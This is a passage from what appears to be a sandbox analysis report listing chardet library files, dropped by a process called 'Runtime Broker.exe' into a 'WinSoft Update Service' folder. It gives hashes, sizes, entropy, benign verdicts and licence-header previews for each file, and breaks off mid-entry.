Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\gb2312freq.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	20715
Entropy (8bit):	3.934954005362253
Encrypted:	false
SSDEEP:	384:8u4UnDMKZJsgZwUfIp3Gy/7IJaGDO4Pd6yFapYgEMke0eapNvVqr:8u4UDMwJhZwUfE3G3jDFapzEMOhVU
MD5:	855D0A3B3FE3F931EB7D4A3F77E9F349
SHA1:	BF8051DEF4AF0BF4B04AD3C997A64A356D2EFECB
SHA-256:	257F25B3078A2E69C2C2693C507110B0B824AFFACFFE411BBE2BC2E2A3CEAE57
SHA-512:	4EA7F01BB64244684BB1CB7BF92B24E6D45DF92B2B8957FFE8198BE569F5862B9666806F355599ED5CAE0CEB655797F90DD4569BAE210F89CDFB15509CBB4B9E
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\gb2312prober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1754
Entropy (8bit):	5.003388925716946
Encrypted:	false
SSDEEP:	24:Pixsiaiq5E807yRiyUVOkH/HqTbVB+HWRTl4VAQsfaonD:Kx/1ef0uwyUjHSvr4FXqD
MD5:	E9B4EABD5CDA31D434F10B7299B4B47E
SHA1:	BC2518F812EEF5713556D847B933230C00BB22D4
SHA-256:	806BC85A2F568438C4FB14171EF348CAB9CBBC46CC01883251267AE4751FCA5C
SHA-512:	07D13ED4B7830FA3FB96B9BB7BD0387B55D5AE4AA83809F04212B4F4F4E574B39017744A522F4AEDD6F1DA26ECDA1CF5F960E011DC677A1D13A670D23F0CCE8C
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\hebrewprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	13838
Entropy (8bit):	4.719327774455086
Encrypted:	false
SSDEEP:	192:Ppf7u4TcWpp0mOJBucQcy4z3lnTB3H19S/egaFTLDVQMfeuVnuK3Ho:Bu4TcWppLIyclnTB3H19SWhLkao
MD5:	EE487DF69E219E2AF034E50ED27F6E99
SHA1:	07093CA2075F52D3D07B399A52F4A7491928FB1C
SHA-256:	737499F8AEE1BF2CC663A251019C4983027FB144BD93459892F318D34601605A
SHA-512:	AEB7BAF2A418B535916ECDEA1A295A5303107A29FA7666C8E6130BC5E80C195A08CD17F5E83D4C9EBE40C0C7F77F8514DB7BE9D063D6D26C6F0E5AED198346D8
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Shy Shalom.# Portions created by the Initial Developer are Copyright (C) 2005.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\jisfreq.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	25777
Entropy (8bit):	3.937817597776383
Encrypted:	false
SSDEEP:	768:8u4e1Pw/tan6GGY/XTTd1SuqmsEn5nxo+1E:8FVanVGYf27E5nxov
MD5:	34BE526E85A890AF4C0C38DF38D56B71
SHA1:	12A38AC0C60C3F5A8756A9E03EE74A22C9B481C0
SHA-256:	BE9989BF606ED09F209CC5513C730579F4D1BE8FE16B59ABC8B8A0F0207080E8
SHA-512:	32C352C308F8956D8FC012C31C523937657F8CD86CC7A1DEE3C11E5770CB892138FD5DD810DD59AF8F1E7ADD6178B5CC06B085FC385BA6F8B3CA3035EE4759D3
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\jpcntx.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	19643
Entropy (8bit):	3.752207229692923
Encrypted:	false
SSDEEP:	384:8u4uzUSmG2Z94gNDp94q0p+Ory6SrE/KWVB7DWGgIYe0OfpOHbOoQFI0j73x8QrN:8u4I
MD5:	09BDB0C4F23A05CFEEB4F498F8B19D96
SHA1:	B6332D34D3820C06E07EB31AB68A22B5365882AA
SHA-256:	3D894DA915104FC2CCDDC4F91661C63F48A2B1C1654D6103F763002EF06E9E0A
SHA-512:	F3393FF0BE901392F905B17B5E53EFBDDA5626DAE62A557F71EBA9C5078ED30D167C0D801D5DB93BA060AD58909B8A2916BCE700B982D7CBBC6A30C102CFA51B
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\langbulgarianmodel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	12839
Entropy (8bit):	3.5093265339383026
Encrypted:	false
SSDEEP:	192:kt17u4Rv++++++++0Gs1++++++++I40KDQZQY4/WP6M6XY:8u4R/xCaQY4/WP7EY
MD5:	528A1E5C2D868348278B142807A4606E
SHA1:	54BB0D1B4646C423489845BFC34693C38BB76861
SHA-256:	D47A904BD3DBB678F5C508318AD24CBF0F17EA42ABE4EA1C90D09959F110ACF1
SHA-512:	ACB27C43929ED49D0AF8D77E7C898DF9575D6DF02D9A0E39A3F1779C8C79ABDF6BA45DE4BE894F67850A775F279183511F5D27AA187C5476CBEBEDB2EAEA82C9
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\langcyrillicmodel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	17948
Entropy (8bit):	3.7741548685644
Encrypted:	false
SSDEEP:	384:8u4+d+d+drd3d3knqdfjspZCjY0CAywu/meIY:8u4bT
MD5:	BA576B5CEF6244553D4AE3A5A517FADA
SHA1:	21E70D7FEFD49E5013AA1CA507E135E27A9A60B2
SHA-256:	2CE0DA8EFB1EB47F3BC980C340A0360942D7507F3BB48DB6DDD85F8E1F59C7D7
SHA-512:	2BD133107E258653FBC82EB29F6D73E657CB4EA7E77FC67081321645E80D9C42B6AA925B94289FB0D00F8287623E02E3791AA2DF169C9275BA74E8A1CD9A5199
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\langgreekmodel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	12688
Entropy (8bit):	3.3227988866651867
Encrypted:	false
SSDEEP:	192:kt17u4Rx++++++++ldo++++++++ldHf8J+aGjZCgXU//gFZNZAPe8N:8u4RbcRf8J+aGjZCgXU//gFZNZ2HN
MD5:	2F544628C587CAEEA5A073F62FE22E9A
SHA1:	FC99EEC2B4D6A416C42F34362C611A0C1F786076
SHA-256:	F18016EDB53C6304896A9D2420949B3CCC35044AB31A35B3A9CA9FD168142800
SHA-512:	8606301C84F47AB259E53B24AC67CC52CFACD7B60945F8B4BEBA5B50386AE8451F9E5581891523EAB420FE665E609690326DB28300E68646BAFA1143839AA475
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\langhebrewmodel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	11345
Entropy (8bit):	3.298000663645527
Encrypted:	false
SSDEEP:	96:PufD9u4RQ++++++++ALN1sq6aVqdJ1Tx6I:PufD9u4RQ++++++++AR6BLdfQI
MD5:	081B896B0E5F58284332EB083B57C23D
SHA1:	A99379F8B40694A970903457C49309A5A5CFFE0C
SHA-256:	2529EA984E44EB6B432D33D3BCBA50B20E6038C3B83DB75646F57B02F91CD070
SHA-512:	F389BCF410F90BAA4DCB6D0B1037567ACF54556D2C78FBA741D44644F57FE9B35D0DFE07AB8D83949ABFE6483E532E407930267F0577AD3AABCC5D4571BC14FC
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Simon Montagu.# Portions created by the Initial Developer are Copyright (C) 2005.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.# Shoshannah Forbes - original C code (?).#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy o

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\langhungarianmodel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	12592
Entropy (8bit):	3.490458557883778
Encrypted:	false
SSDEEP:	192:kt17u4RQ++++++++h4Hx++++++++KDpmz+dHBTpn2nI8A0tI3+y8:8u4RvcdmadHBTpn2bA0tUb8
MD5:	116441345B6DEA1860A612640E5D4076
SHA1:	405782037A416D6A7FF4972183CDD39BBE16EA87
SHA-256:	4616A96121B997465A3BE555E056A7E6C5B4591190AA1C0133AD72C77CB1C8E0
SHA-512:	5A6B8F4E254B0206ED59161B55F59193946B9067E3611E93077D1D0BFDA3D1973CAFC02819B0C414DDCC722AD73A27255337F1851A7F9468D34AB00B873999FC
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\langthaimodel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	11290
Entropy (8bit):	3.2611023542501876
Encrypted:	false
SSDEEP:	192:kt17u4Rv++++++++5nerPSK+b2cMxbKaDNSPBP390/F:8u4RUWK+b1KKaJSPBP39UF
MD5:	A16667682BBDEC52F9D85E053D37FB01
SHA1:	0EE25220185C3E718F5D1982A7575FCC112FA358
SHA-256:	F25D35EF71AEFD6E86F26C6640E4C417896CD98744EC5C567F74244B11065C94
SHA-512:	682D736606A4F6BC61709B8D81224711317C75A6825A254871429CB351130E77D0993FAE31AAFAF4C80DD1B8A7E6989196FCB0A008B8B334585C9B0C84E6C5E7
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\langturkishmodel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	UTF-8 Unicode text
Category:	dropped
Size (bytes):	11102
Entropy (8bit):	3.2548132896963096
Encrypted:	false
SSDEEP:	96:gst17u4Re5XtHk3V45NlcRxIwZigp8bYPVbaHypSltU06K+N:dt17u4RN3V45NlcRKw0gp5VeHgQtX+N
MD5:	3985287461AC7F5C1DC00F0A3E9B3B9B
SHA1:	ECE51C3B4F64E6D6F15F4E8A6546EE81C8214853
SHA-256:	5B6D9E44D26CA88EAE5807F05D22955969C27AB62AAC8F1D6504E6FCCD254459
SHA-512:	9FC955D11EFA68CDA063A7B2B03A3EF3892CF193B6743C782B268E591156A731084193EF845F1CE8977A5789B7D5DAFDF1E9DD4EC0C6C382D8916907CB63170B
Malicious:	false
Preview:	# -- coding: utf-8 --.######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# .zg.r Bask.n - Turkish Language Model.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\latin1prober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	5370
Entropy (8bit):	4.724145544254619
Encrypted:	false
SSDEEP:	96:Ptzcu4I3PIXMmmmmmOmmmmmmJmmmmmmcmJxBeEJbchy18IuIB+N5:Ptzcu46xBJCxD5
MD5:	4EC6FE5DA8DDBED7AA355DF81BD0E6AF
SHA1:	18AAFA5D34C519C51823A7A4737DD07F79E11DB9
SHA-256:	4B6228391845937F451053A54855AD815C9B4623FA87B0652E574755C94D914F
SHA-512:	F8608DD1F72AFA5355F10F343A69002D80A5287D6968BDB3C9A3493816179E3E8FE265453DE51ADA7F69BDA3549A3545C45E6136B8BD6A9D36F52E77351F84A5
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\mbcharsetprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3413
Entropy (8bit):	4.691758401653377
Encrypted:	false
SSDEEP:	48:Px/zeL0uwyUjHSU0JMB/0dQ5Wn7c6H5RNMVyylElKBq8CdTIIbu:Ptz/u4GJMB2n7c6HtQyylEl+bCdTIIbu
MD5:	D7BB9DEC5E8045651A957E956E6CFDC7
SHA1:	EEB555BEF8B05F40C0AA6D81BF2B323B875FC653
SHA-256:	011F797851FDBEEA927EF2D064DF8BE628DE6B6E4D3810A85EAC3CB393BDC4B4
SHA-512:	1790596D9A6E1ADA7EBE3D103793445B1EE2393E9CD0964E39BCE5B023CB49F0D387F17F9E8B88BBDBF5F27E183058896EEABB93465ABFCBEB359131E32A9BA4
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.# Proofpoint, Inc..#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\mbcsgroupprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2012
Entropy (8bit):	4.937443894092934
Encrypted:	false
SSDEEP:	48:Px/zeL0uwyUjHSP+cWg/bBkPmJsB8acnd+:Ptz/u4MJsBrod+
MD5:	D11B219F9A5CC6B48D492BEB69C3D9C3
SHA1:	9E6D7D608F78DD6AE8D09BFC9D46E41C7F287BB1
SHA-256:	87A4D19E762AD8EC46D56743E493B2C5C755A67EDD1B4ABEBC1F275ABE666E1E
SHA-512:	C0DD5DDC5EDF0BE6E3595A033B050AE8FC2471B805D2295CA7FE01C1F5F6CA005D047A34E8FE047EF682FAB75D8762DE7BAB05D8F4E4359E012ED65F327628EF
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.# Proofpoint, Inc..#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\mbcssm.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	25481
Entropy (8bit):	4.703644928512803
Encrypted:	false
SSDEEP:	192:Kt17u4PJ9G///8/eeeeeHN999999jyTMG/96U////////9eeeeeeeea/99///99M:6u42f17JlwxjpFhHJ
MD5:	3084C6E597BB859E0CDF091E046C9D5E
SHA1:	0501C978D8B4BDB0883F06F604139896AA3634BD
SHA-256:	498DF6C15205DC7CDC8D8DC1684B29CBD99EB5B3522B120807444A3E7EED8E92
SHA-512:	CD72A229BDAD4CAC29334326BF5B2DF59B3551D0591E2794668CF9BA194C2B1301CDD781F904F6CE8561A0A4ABE339A8AEDBF0676914CFA9D433770ED7F7DE3B
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\sbcharsetprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	5657
Entropy (8bit):	4.617805667858085
Encrypted:	false
SSDEEP:	48:Px/zeY0uwyUjHSUn84JH6c260o1ap/TI0lwhvmwqWRhu9XSjVZjbEy+p4uLEu5vJ:Ptzcu4dRJHv2+18Jl6yXS495vzCIIaR
MD5:	23667CADF3B959C3C7A3963B73872C0E
SHA1:	A490B74C7447961DF50345929EB938A1B4CD05A1
SHA-256:	2C34A90A5743085958C149069300F6A05C4B94F5885974F4F5A907FF63E263BE
SHA-512:	5B248DAC83BA1C4A89C8C4C6ACE29A0C332A3A2A6F950201ADABF6C47108D0E1B89F260C7005295FBE35AB024FD170370DBCBA6C0F8C9550E2A26B66F0451303
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\sbcsgroupprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3546
Entropy (8bit):	4.822899855454654
Encrypted:	false
SSDEEP:	48:Px/zeY0uwyUjHSPq3EWXJZ1efVJs/4yqlWqCqUWqBNquHJmSBLuM+BYk3Okh:Ptzcu4mKJZ1wJspqlWqCqUWqBNqaJXC
MD5:	80AF9AC2D6BC6BEF0FE025C26FA8CD81
SHA1:	C7CEE5D08A3A51B05696A44ACEDE1C9C8610BC0B
SHA-256:	D48A6B70207F935A9F9A7C460BA3016F110B94AA83DEC716E92F1823075EC970
SHA-512:	05D24E8E0F5F0875BCA047A4C1D2EF12067A8991AB4490824D488D96C2CDC90E3AAE05B9297839B142ED7A1C9A8D3306575CD96FFD3130AE17CA9630B906F665
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\sjisprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3774
